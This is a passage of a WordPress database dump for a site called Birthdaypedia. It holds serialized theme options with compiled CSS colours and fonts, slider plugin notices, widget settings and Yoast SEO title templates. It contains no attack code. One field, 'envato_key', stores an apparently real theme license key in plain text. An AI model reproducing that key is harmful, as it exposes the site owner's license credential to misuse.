.td-subcat-more i,\r\n .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-display-option:hover,\r\n .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-display-option:hover i,\r\n .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-link:hover,\r\n .td-block-title-wrap .td-wrapper-pulldown-filter .td-pulldown-filter-item .td-cur-simple-item,\r\n .global-block-template-2 .td-related-title .td-cur-simple-item,\r\n .global-block-template-5 .td-related-title .td-cur-simple-item,\r\n .global-block-template-6 .td-related-title .td-cur-simple-item,\r\n .global-block-template-7 .td-related-title .td-cur-simple-item,\r\n .global-block-template-8 .td-related-title .td-cur-simple-item,\r\n .global-block-template-9 .td-related-title .td-cur-simple-item,\r\n .global-block-template-10 .td-related-title .td-cur-simple-item,\r\n .global-block-template-11 .td-related-title .td-cur-simple-item,\r\n .global-block-template-12 .td-related-title .td-cur-simple-item,\r\n .global-block-template-13 .td-related-title .td-cur-simple-item,\r\n .global-block-template-14 .td-related-title .td-cur-simple-item,\r\n .global-block-template-15 .td-related-title .td-cur-simple-item,\r\n .global-block-template-16 .td-related-title .td-cur-simple-item,\r\n .global-block-template-17 .td-related-title .td-cur-simple-item,\r\n .td-theme-wrap .sf-menu ul .td-menu-item > a:hover,\r\n .td-theme-wrap .sf-menu ul .sfHover > a,\r\n .td-theme-wrap .sf-menu ul .current-menu-ancestor > a,\r\n .td-theme-wrap .sf-menu ul .current-category-ancestor > a,\r\n .td-theme-wrap .sf-menu ul .current-menu-item > a {\r\n color: #ff7f7f;\r\n }\r\n\r\n a.vc_btn-black.vc_btn_square_outlined:hover,\r\n a.vc_btn-black.vc_btn_outlined:hover,\r\n .td-mega-menu-page .wpb_content_element ul li a:hover,\r\n .td-theme-wrap .td-aj-search-results .td_module_wrap:hover .entry-title a,\r\n .td-theme-wrap .header-search-wrap .result-msg a:hover {\r\n color: #ff7f7f !important;\r\n }\r\n\r\n .td-next-prev-wrap a:hover,\r\n .td-load-more-wrap a:hover,\r\n .td-post-small-box a:hover,\r\n .page-nav .current,\r\n .page-nav:first-child > div,\r\n .td_category_template_8 .td-category-header .td-category a.td-current-sub-category,\r\n .td_category_template_4 .td-category-siblings .td-category a:hover,\r\n #bbpress-forums .bbp-pagination .current,\r\n .post .td_quote_box,\r\n .page .td_quote_box,\r\n a.vc_btn-black:hover,\r\n .td_block_template_5 .td-block-title > * {\r\n border-color: #ff7f7f;\r\n }\r\n\r\n .td_wrapper_video_playlist .td_video_currently_playing:after {\r\n border-color: #ff7f7f !important;\r\n }\r\n\r\n .header-search-wrap .td-drop-down-search:before {\r\n border-color: transparent transparent #ff7f7f transparent;\r\n }\r\n\r\n .block-title > span,\r\n .block-title > a,\r\n .block-title > label,\r\n .widgettitle,\r\n .widgettitle:after,\r\n .td-trending-now-title,\r\n .td-trending-now-wrapper:hover .td-trending-now-title,\r\n .wpb_tabs li.ui-tabs-active a,\r\n .wpb_tabs li:hover a,\r\n .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,\r\n .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,\r\n .td_block_template_1 .td-related-title .td-cur-simple-item,\r\n .woocommerce .product .products h2,\r\n .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more {\r\n background-color: #ff7f7f;\r\n }\r\n\r\n .woocommerce div.product .woocommerce-tabs ul.tabs li.active {\r\n background-color: #ff7f7f !important;\r\n }\r\n\r\n .block-title,\r\n .td_block_template_1 .td-related-title,\r\n .wpb_tabs .wpb_tabs_nav,\r\n .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,\r\n .woocommerce div.product .woocommerce-tabs ul.tabs:before {\r\n border-color: #ff7f7f;\r\n }\r\n .td_block_wrap .td-subcat-item a.td-cur-simple-item {\r\n color: #ff7f7f;\r\n }\r\n\r\n\r\n \r\n .td-grid-style-4 .entry-title\r\n {\r\n background-color: rgba(255, 127, 127, 0.7);\r\n }\r\n\r\n \r\n .td-header-wrap .td-header-menu-wrap-full,\r\n .sf-menu > .current-menu-ancestor > a,\r\n .sf-menu > .current-category-ancestor > a,\r\n .td-header-menu-wrap.td-affix,\r\n .td-header-style-3 .td-header-main-menu,\r\n .td-header-style-3 .td-affix .td-header-main-menu,\r\n .td-header-style-4 .td-header-main-menu,\r\n .td-header-style-4 .td-affix .td-header-main-menu,\r\n .td-header-style-8 .td-header-menu-wrap.td-affix,\r\n .td-header-style-8 .td-header-top-menu-full {\r\n background-color: #c9c9ff;\r\n }\r\n\r\n\r\n .td-boxed-layout .td-header-style-3 .td-header-menu-wrap,\r\n .td-boxed-layout .td-header-style-4 .td-header-menu-wrap,\r\n .td-header-style-3 .td_stretch_content .td-header-menu-wrap,\r\n .td-header-style-4 .td_stretch_content .td-header-menu-wrap {\r\n background-color: #c9c9ff !important;\r\n }\r\n\r\n\r\n @media (min-width: 1019px) {\r\n .td-header-style-1 .td-header-sp-recs,\r\n .td-header-style-1 .td-header-sp-logo {\r\n margin-bottom: 28px;\r\n }\r\n }\r\n\r\n @media (min-width: 768px) and (max-width: 1018px) {\r\n .td-header-style-1 .td-header-sp-recs,\r\n .td-header-style-1 .td-header-sp-logo {\r\n margin-bottom: 14px;\r\n }\r\n }\r\n\r\n .td-header-style-7 .td-header-top-menu {\r\n border-bottom: none;\r\n }\r\n\r\n\r\n \r\n .sf-menu > .current-menu-item > a:after,\r\n .sf-menu > .current-menu-ancestor > a:after,\r\n .sf-menu > .current-category-ancestor > a:after,\r\n .sf-menu > li:hover > a:after,\r\n .sf-menu > .sfHover > a:after,\r\n .td_block_mega_menu .td-next-prev-wrap a:hover,\r\n .td-mega-span .td-post-category:hover,\r\n .td-header-wrap .black-menu .sf-menu > li > a:hover,\r\n .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a,\r\n .td-header-wrap .black-menu .sf-menu > .sfHover > a,\r\n .header-search-wrap .td-drop-down-search:after,\r\n .header-search-wrap .td-drop-down-search .btn:hover,\r\n .td-header-wrap .black-menu .sf-menu > .current-menu-item > a,\r\n .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a,\r\n .td-header-wrap .black-menu .sf-menu > .current-category-ancestor > a {\r\n background-color: #ff7f7f;\r\n }\r\n\r\n\r\n .td_block_mega_menu .td-next-prev-wrap a:hover {\r\n border-color: #ff7f7f;\r\n }\r\n\r\n .header-search-wrap .td-drop-down-search:before {\r\n border-color: transparent transparent #ff7f7f transparent;\r\n }\r\n\r\n .td_mega_menu_sub_cats .cur-sub-cat,\r\n .td_mod_mega_menu:hover .entry-title a,\r\n .td-theme-wrap .sf-menu ul .td-menu-item > a:hover,\r\n .td-theme-wrap .sf-menu ul .sfHover > a,\r\n .td-theme-wrap .sf-menu ul .current-menu-ancestor > a,\r\n .td-theme-wrap .sf-menu ul .current-category-ancestor > a,\r\n .td-theme-wrap .sf-menu ul .current-menu-item > a {\r\n color: #ff7f7f;\r\n }\r\n\r\n\r\n \r\n .td-footer-wrapper,\r\n .td-footer-wrapper .td_block_template_7 .td-block-title > *,\r\n .td-footer-wrapper .td_block_template_17 .td-block-title,\r\n .td-footer-wrapper .td-block-title-wrap .td-wrapper-pulldown-filter {\r\n background-color: #ffffff;\r\n }\r\n\r\n \r\n .td-sub-footer-container {\r\n background-color: #c9c9ff;\r\n }\r\n\r\n \r\n .td-sub-footer-container,\r\n .td-subfooter-menu li a {\r\n color: #000000;\r\n }\r\n\r\n \r\n ul.sf-menu > .td-menu-item > a {\r\n font-family:\"Quattrocento Sans\";\n font-size:16px;\n font-weight:bold;\n \r\n }\r\n \r\n .td-page-content h1,\r\n .wpb_text_column h1 {\r\n font-weight:bold;\n \r\n }\";s:10:\"envato_key\";s:36:\"f5aa58bd-85d9-4873-97f1-0b3862accabe\";s:17:\"td_cake_lp_status\";s:7:\"lp_sent\";s:29:\"tds_mega_menu_ajax_preloading\";s:0:\"\";s:27:\"tds_footer_background_image\";s:0:\"\";s:28:\"tds_footer_background_repeat\";s:0:\"\";s:26:\"tds_footer_background_size\";s:0:\"\";s:30:\"tds_footer_background_position\";s:0:\"\";s:29:\"tds_footer_background_opacity\";s:0:\"\";s:26:\"tds_woo_single_sidebar_pos\";s:0:\"\";s:22:\"tds_woo_single_sidebar\";s:0:\"\";s:29:\"tds_category_pagination_style\";s:0:\"\";s:23:\"tds_general_modal_image\";s:0:\"\";s:33:\"td_module_mega_menu_title_excerpt\";s:0:\"\";s:29:\"tds_footer_bottom_hover_color\";s:0:\"\";s:15:\"tds_custom_html\";s:0:\"\";s:15:\"tds_theme_color\";s:7:\"#ff7f7f\";s:25:\"tds_site_background_color\";s:7:\"#fafafa\";s:16:\"tds_header_color\";s:0:\"\";s:21:\"tds_text_header_color\";s:0:\"\";s:8:\"td_fonts\";a:2:{s:9:\"main_menu\";a:3:{s:11:\"font_family\";s:5:\"g_500\";s:9:\"font_size\";s:4:\"16px\";s:11:\"font_weight\";s:4:\"bold\";}s:7:\"page_h1\";a:1:{s:11:\"font_weight\";s:4:\"bold\";}}s:18:\"td_fonts_js_buffer\";s:0:\"\";s:19:\"td_fonts_css_buffer\";s:0:\"\";s:18:\"td_fonts_css_files\";s:60:\"://fonts.googleapis.com/css?family=Quattrocento+Sans:400,700\";s:14:\"tds_menu_color\";s:7:\"#c9c9ff\";s:23:\"tds_submenu_hover_color\";s:7:\"#ff7f7f\";s:19:\"tds_menu_text_color\";s:0:\"\";s:20:\"tds_post_title_color\";s:0:\"\";s:26:\"tds_post_author_name_color\";s:0:\"\";s:22:\"tds_post_content_color\";s:0:\"\";s:16:\"tds_post_h_color\";s:0:\"\";s:25:\"tds_post_blockquote_color\";s:0:\"\";s:20:\"tds_page_title_color\";s:0:\"\";s:22:\"tds_page_content_color\";s:0:\"\";s:16:\"tds_page_h_color\";s:0:\"\";s:18:\"tds_top_menu_color\";s:0:\"\";s:23:\"tds_top_menu_text_color\";s:0:\"\";s:29:\"tds_top_menu_text_hover_color\";s:0:\"\";s:26:\"tds_top_social_icons_color\";s:0:\"\";s:32:\"tds_top_social_icons_hover_color\";s:0:\"\";s:11:\"tds_data_js\";s:0:\"\";s:20:\"tds_weather_top_menu\";s:0:\"\";s:29:\"tds_weather_location_top_menu\";s:0:\"\";s:26:\"tds_weather_units_top_menu\";s:0:\"\";s:20:\"tds_footer_instagram\";s:0:\"\";s:23:\"tds_footer_instagram_id\";s:0:\"\";s:41:\"tds_footer_instagram_on_row_images_number\";s:0:\"\";s:32:\"tds_footer_instagram_rows_number\";s:0:\"\";s:30:\"tds_footer_instagram_image_gap\";s:0:\"\";s:19:\"tds_footer_logo_alt\";s:0:\"\";s:21:\"tds_footer_logo_title\";s:0:\"\";s:22:\"tds_category_pull_down\";s:0:\"\";s:28:\"tds_default_category_display\";s:0:\"\";s:22:\"tds_category_module_17\";s:0:\"\";s:22:\"tds_category_module_18\";s:0:\"\";s:22:\"tds_category_module_19\";s:0:\"\";s:24:\"tds_category_module_mx15\";s:0:\"\";s:24:\"tds_category_module_mx16\";s:0:\"\";s:24:\"tds_category_module_mx17\";s:0:\"\";s:22:\"tds_m_show_author_name\";s:0:\"\";s:15:\"tds_m_show_date\";s:4:\"hide\";s:19:\"tds_m_show_comments\";s:4:\"hide\";s:27:\"tds_mobile_background_image\";s:0:\"\";s:28:\"tds_mobile_background_repeat\";s:0:\"\";s:26:\"tds_mobile_background_size\";s:0:\"\";s:30:\"tds_mobile_background_position\";s:0:\"\";s:26:\"tds_login_background_image\";s:0:\"\";s:27:\"tds_login_background_repeat\";s:0:\"\";s:25:\"tds_login_background_size\";s:0:\"\";s:29:\"tds_login_background_position\";s:0:\"\";s:26:\"td_module_17_title_excerpt\";s:0:\"\";s:28:\"td_module_17_content_excerpt\";s:0:\"\";s:26:\"td_module_18_title_excerpt\";s:0:\"\";s:28:\"td_module_18_content_excerpt\";s:0:\"\";s:26:\"td_module_19_title_excerpt\";s:0:\"\";s:28:\"td_module_19_content_excerpt\";s:0:\"\";s:28:\"td_module_mx15_title_excerpt\";s:0:\"\";s:28:\"td_module_mx16_title_excerpt\";s:0:\"\";s:30:\"td_module_mx16_content_excerpt\";s:0:\"\";s:28:\"td_module_mx17_title_excerpt\";s:0:\"\";s:19:\"tds_text_logo_color\";s:0:\"\";s:27:\"tds_text_logo_tagline_color\";s:0:\"\";s:28:\"tds_footer_widget_text_color\";s:0:\"\";s:22:\"td_fonts_user_inserted\";a:43:{s:11:\"font_file_1\";s:0:\"\";s:13:\"font_family_1\";s:0:\"\";s:11:\"font_file_2\";s:0:\"\";s:13:\"font_family_2\";s:0:\"\";s:11:\"font_file_3\";s:0:\"\";s:13:\"font_family_3\";s:0:\"\";s:10:\"typekit_js\";s:0:\"\";s:22:\"type_kit_font_family_1\";s:0:\"\";s:22:\"type_kit_font_family_2\";s:0:\"\";s:22:\"type_kit_font_family_3\";s:0:\"\";s:8:\"g_arabic\";s:0:\"\";s:9:\"g_bengali\";s:0:\"\";s:10:\"g_cyrillic\";s:0:\"\";s:14:\"g_cyrillic-ext\";s:0:\"\";s:12:\"g_devanagari\";s:0:\"\";s:7:\"g_greek\";s:0:\"\";s:11:\"g_greek-ext\";s:0:\"\";s:10:\"g_gujarati\";s:0:\"\";s:8:\"g_hebrew\";s:0:\"\";s:7:\"g_khmer\";s:0:\"\";s:7:\"g_latin\";s:0:\"\";s:11:\"g_latin-ext\";s:0:\"\";s:7:\"g_tamil\";s:0:\"\";s:8:\"g_telugu\";s:0:\"\";s:6:\"g_thai\";s:0:\"\";s:12:\"g_vietnamese\";s:0:\"\";s:10:\"g_100_thin\";s:0:\"\";s:17:\"g_100_thin_italic\";s:0:\"\";s:17:\"g_200_extra_light\";s:0:\"\";s:24:\"g_200_extra_light_italic\";s:0:\"\";s:11:\"g_300_light\";s:0:\"\";s:18:\"g_300_light_italic\";s:0:\"\";s:19:\"g_400_normal_italic\";s:0:\"\";s:12:\"g_500_medium\";s:0:\"\";s:19:\"g_500_medium_italic\";s:0:\"\";s:15:\"g_600_semi_bold\";s:0:\"\";s:22:\"g_600_semi_bold_italic\";s:0:\"\";s:10:\"g_700_bold\";s:0:\"\";s:17:\"g_700_bold_italic\";s:0:\"\";s:16:\"g_800_extra_bold\";s:0:\"\";s:23:\"g_800_extra_bold_italic\";s:0:\"\";s:11:\"g_900_black\";s:0:\"\";s:18:\"g_900_black_italic\";s:0:\"\";}s:16:\"tds_login_mobile\";s:4:\"hide\";s:19:\"tds_theme_color_mob\";s:7:\"#ff7f7f\";s:23:\"tds_menu_background_mob\";s:7:\"#ffffff\";s:23:\"tds_menu_icon_color_mob\";s:7:\"#ff7f7f\";s:25:\"tds_menu_gradient_one_mob\";s:7:\"#ffa3a3\";s:25:\"tds_menu_gradient_two_mob\";s:7:\"#ffffff\";s:23:\"tds_menu_text_color_mob\";s:0:\"\";s:30:\"tds_menu_text_active_color_mob\";s:0:\"\";s:30:\"tds_menu_button_background_mob\";s:0:\"\";s:25:\"tds_menu_button_color_mob\";s:0:\"\";s:25:\"tds_footer_background_mob\";s:0:\"\";s:25:\"tds_footer_text_color_mob\";s:0:\"\";s:29:\"tds_sub_footer_background_mob\";s:0:\"\";s:29:\"tds_sub_footer_text_color_mob\";s:0:\"\";s:31:\"tds_mobile_background_image_mob\";s:0:\"\";s:32:\"tds_mobile_background_repeat_mob\";s:0:\"\";s:30:\"tds_mobile_background_size_mob\";s:0:\"\";s:34:\"tds_mobile_background_position_mob\";s:0:\"\";s:16:\"tds_ad_title_mob\";s:0:\"\";s:22:\"tds_loop_ad_module_mob\";s:1:\"3\";s:27:\"tds_inline_ad_paragraph_mob\";s:1:\"4\";s:29:\"td_module_mob_1_title_excerpt\";s:0:\"\";s:29:\"td_module_mob_2_title_excerpt\";s:0:\"\";s:18:\"tds_custom_css_mob\";s:0:\"\";s:25:\"tds_custom_javascript_mob\";s:0:\"\";s:19:\"tds_custom_html_mob\";s:0:\"\";s:24:\"tds_user_compile_css_mob\";s:1583:\"a,\r\n .td-post-author-name a,\r\n .td-mobile-content .current-menu-item > a,\r\n .td-mobile-content .current-menu-ancestor > a,\r\n .footer-email-wrap a,\r\n .td-search-query,\r\n .td-page-content blockquote p,\r\n .td-post-content blockquote p {\r\n color: #ff7f7f;\r\n }\r\n\r\n .td-scroll-up,\r\n .td-rating-bar-wrap div,\r\n .td-page-content .dropcap,\r\n .td-post-content .dropcap,\r\n .comment-content .dropcap,\r\n .td_wrapper_video_playlist .td_video_controls_playlist_wrapper {\r\n background-color: #ff7f7f;\r\n }\r\n\r\n\r\n .td_quote_box,\r\n .td_wrapper_video_playlist .td_video_currently_playing:after {\r\n border-color: #ff7f7f;\r\n }\r\n\r\n \r\n .td-header-wrap {\r\n background-color: #ffffff;\r\n }\r\n \r\n #td-top-mobile-toggle i,\r\n .td-search-icon .td-icon-search {\r\n color: #ff7f7f;\r\n }\r\n \r\n .td-menu-background:before,\r\n .td-search-background:before {\r\n background: #ffa3a3;\r\n background: -moz-linear-gradient(top, #ffa3a3 0%, #ffffff 100%);\r\n background: -webkit-gradient(left top, left bottom, color-stop(0%, #ffa3a3), color-stop(100%, #ffffff));\r\n background: -webkit-linear-gradient(top, #ffa3a3 0%, #ffffff 100%);\r\n background: -o-linear-gradient(top, #ffa3a3 0%, #ffffff 100%);\r\n background: -ms-linear-gradient(top, #ffa3a3 0%, #ffffff 100%);\r\n background: linear-gradient(to bottom, #ffa3a3 0%, #ffffff 100%);\r\n filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'#ffa3a3\', endColorstr=\'#ffffff\', GradientType=0 );\r\n }\";s:16:\"tds_header_title\";s:0:\"\";s:20:\"tds_footer_top_title\";s:0:\"\";s:24:\"tds_content_bottom_title\";s:0:\"\";s:28:\"td_timestamp_install_plugins\";s:0:\"\";s:21:\"tds_content_top_title\";s:0:\"\";s:24:\"tds_content_inline_title\";s:0:\"\";s:15:\"td_full_top_bar\";s:0:\"\";s:14:\"td_full_header\";s:0:\"\";s:12:\"td_full_menu\";s:0:\"\";s:24:\"td_full_footer_instagram\";s:0:\"\";s:14:\"td_full_footer\";s:0:\"\";s:36:\"tds_taxonomy_post_format_page_layout\";s:0:\"\";s:36:\"tds_taxonomy_post_format_sidebar_pos\";s:0:\"\";s:32:\"tds_taxonomy_post_format_sidebar\";s:0:\"\";s:25:\"tds_global_block_template\";s:0:\"\";s:24:\"tds_category_module_mx18\";s:0:\"\";s:24:\"tds_category_module_mx19\";s:0:\"\";s:24:\"tds_category_module_mx20\";s:0:\"\";s:24:\"tds_category_module_mx21\";s:0:\"\";s:24:\"tds_category_module_mx22\";s:0:\"\";s:24:\"tds_category_module_mx23\";s:0:\"\";s:24:\"tds_category_module_mx24\";s:0:\"\";s:24:\"tds_category_module_mx25\";s:0:\"\";s:24:\"tds_category_module_mx26\";s:0:\"\";s:28:\"td_module_mx18_title_excerpt\";s:0:\"\";s:28:\"td_module_mx19_title_excerpt\";s:0:\"\";s:28:\"td_module_mx20_title_excerpt\";s:0:\"\";s:28:\"td_module_mx21_title_excerpt\";s:0:\"\";s:28:\"td_module_mx22_title_excerpt\";s:0:\"\";s:28:\"td_module_mx23_title_excerpt\";s:0:\"\";s:28:\"td_module_mx24_title_excerpt\";s:0:\"\";s:28:\"td_module_mx25_title_excerpt\";s:0:\"\";s:28:\"td_module_mx26_title_excerpt\";s:0:\"\";s:29:\"tds_footer_social_icons_color\";s:0:\"\";s:35:\"tds_footer_social_icons_hover_color\";s:0:\"\";s:22:\"tds_post_style_1_title\";s:0:\"\";s:23:\"tds_post_style_11_title\";s:0:\"\";s:23:\"tds_post_style_12_title\";s:0:\"\";s:22:\"tds_smart_list_6_title\";s:0:\"\";s:22:\"tds_smart_list_7_title\";s:0:\"\";s:22:\"tds_smart_list_8_title\";s:0:\"\";}','yes'),(477,'revslider_checktables','1','yes'),(478,'revslider-static-css','.tp-caption a {\ncolor:#ff7302;\ntext-shadow:none;\n-webkit-transition:all 0.2s ease-out;\n-moz-transition:all 0.2s ease-out;\n-o-transition:all 0.2s ease-out;\n-ms-transition:all 0.2s ease-out;\n}\n\n.tp-caption a:hover {\ncolor:#ffa902;\n}','yes'),(479,'revslider-update-check-short','1694678538','yes'),(481,'vc_version','5.1','yes'),(492,'widget_td_block_social_counter_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(493,'widget_td_block_ad_box_widget','a:3:{i:2;a:2:{s:7:\"spot_id\";s:11:\"custom_ad_1\";s:10:\"spot_title\";s:0:\"\";}i:3;a:2:{s:7:\"spot_id\";s:11:\"custom_ad_2\";s:10:\"spot_title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(494,'widget_td_block_15_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(495,'widget_td_block_6_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(496,'td_social_api_v3_last_val','a:5:{s:8:\"facebook\";a:5:{s:5:\"count\";s:1:\"1\";s:8:\"ok_count\";s:1:\"1\";s:9:\"timestamp\";i:1441734883;s:7:\"expires\";i:10800;s:3:\"uid\";s:13:\"birthdaypedia\";}s:10:\"googleplus\";a:4:{s:9:\"timestamp\";i:1441734883;s:5:\"count\";i:0;s:3:\"uid\";s:70:\"https://plus.google.com/u/1/b/102531223699476703415/dashboard/overview\";s:7:\"expires\";i:10800;}s:9:\"instagram\";a:4:{s:9:\"timestamp\";i:1438187084;s:5:\"count\";i:0;s:3:\"uid\";s:6:\"envato\";s:7:\"expires\";i:10800;}s:7:\"twitter\";a:5:{s:5:\"count\";i:1;s:8:\"ok_count\";i:1;s:9:\"timestamp\";i:1441734884;s:7:\"expires\";i:10800;s:3:\"uid\";s:13:\"birthdaypedia\";}s:7:\"youtube\";a:5:{s:5:\"count\";i:8395;s:8:\"ok_count\";i:8395;s:9:\"timestamp\";i:1438187084;s:7:\"expires\";i:10800;s:3:\"uid\";s:6:\"envato\";}}','yes'),(499,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(518,'revslider-latest-version','6.6.16','yes'),(519,'revslider-notices','a:3:{i:0;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"1.0.0\";s:4:\"text\";s:546:\"<div style=\"display: block; background: #fff;text-align: center; height: 250px;\"><a href=\"https://account.sliderrevolution.com/portal/pricing/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=getpremium\" target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: cover; background-size: cover; opacity: 1; width: 960px; height: 250px; display: inline-block;\" muted=\"\" loop=\"\" autoplay=\"\" preload=\"auto\"><source src=\"https://sliderrevolution.com/wp-content/uploads/2021/07/adminpremiumvid4.mp4\" type=\"video/mp4\"></video></a></div>\";s:4:\"code\";s:12:\"TPRSV6511-01\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:1;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"1.9.9\";s:4:\"text\";s:556:\"<div style=\"display: block; background: #fff;text-align: center; \nheight: 300px;\"><a \nhref=\"https://www.sliderrevolution.com/slider-revolution-visual-editor-version-6-6/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=update66\"\n target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: \ncover; background-size: cover; opacity: 1; width: 920px; height: 300px; \ndisplay: inline-block;\" muted loop autoplay \npreload=\"auto\"><source src=\"//updates.themepunch.tools//banners/rs60/update66videobanner2.mp4\" type=\"video/mp4\"></video></a></div>\n\";s:4:\"code\";s:8:\"TPRSV663\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:2;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"9.9.9\";s:4:\"text\";s:556:\"<div style=\"display: block; background: #fff;text-align: center; \nheight: 300px;\"><a \nhref=\"https://www.sliderrevolution.com/slider-revolution-visual-editor-version-6-6/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=update66\"\n target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: \ncover; background-size: cover; opacity: 1; width: 920px; height: 300px; \ndisplay: inline-block;\" muted loop autoplay \npreload=\"auto\"><source src=\"//updates.themepunch.tools//banners/rs60/update66videobanner2.mp4\" type=\"video/mp4\"></video></a></div>\n\";s:4:\"code\";s:8:\"TPRSV668\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}}','yes'),(925,'recently_activated','a:0:{}','yes'),(932,'wpseo','a:25:{s:14:\"blocking_files\";a:0:{}s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:3:\"6.2\";s:12:\"company_logo\";s:62:\"https://birthdaypedia.com/wp-content/uploads/2015/06/logo1.png\";s:12:\"company_name\";s:18:\"Orange Interactive\";s:17:\"company_or_person\";s:7:\"company\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:12:\"website_name\";s:13:\"Birthdaypedia\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:20:\"enable_setting_pages\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:0;s:18:\"first_activated_on\";i:1478643145;}','yes'),(933,'wpseo_permalinks','a:13:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:14:\"hide-feedlinks\";b:0;s:12:\"hide-rsdlink\";b:0;s:14:\"hide-shortlink\";b:0;s:16:\"hide-wlwmanifest\";b:0;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(934,'wpseo_titles','a:54:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:5:\"noodp\";b:0;s:6:\"noydir\";b:0;s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% 